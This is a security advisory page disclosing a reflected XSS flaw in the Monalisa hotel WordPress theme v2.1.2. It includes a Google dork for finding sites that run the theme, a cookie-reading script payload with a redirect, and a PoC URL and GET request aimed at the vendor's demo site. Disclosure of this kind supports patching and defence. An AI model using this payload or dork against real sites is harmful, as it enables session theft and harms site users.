Monalisa | Hotel & Resort WordPress Theme v2.1.2 - Unauthenticated Reflected XSS

2020.07.13
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Exploit Title: Monalisa | Hotel & Resort WordPress Theme v2.1.2 - Unauthenticated Reflected XSS [+] Google Dork: inurl:/wp-content/themes/monalisa/ [+] Date: 2020-07-02 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: InwaveThemes [ http://inwavethemes.com ] [+] Software Version: 2.1.2 [+] Software Link: https://themeforest.net/item/monalisa-hotel-resort-management-wordpress-theme/17339084 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated Reflected XSS vulnerability was discovered in the Monalisa theme through 2.1.2 for WordPress. ### [ Payload: ] [$] 1"--><img src=x onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;> ### [ PoC: ] [!] http://inwavethemes.com/wordpress/monalisa/reservation/?state=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E [!] GET /wordpress/monalisa/reservation/?state=1%22--%3E%3Cimg%20src=x%20onerror=(alert)(document.cookie);window.location=`https://twitter.com/vlad_vector`;%3E HTTP/1.1 Host: inwavethemes.com ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-02-monalisa-hotel-resort-wordpress-theme-v2-1-2.txt
https://themeforest.net/item/monalisa-hotel-resort-management-wordpress-theme/17339084


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top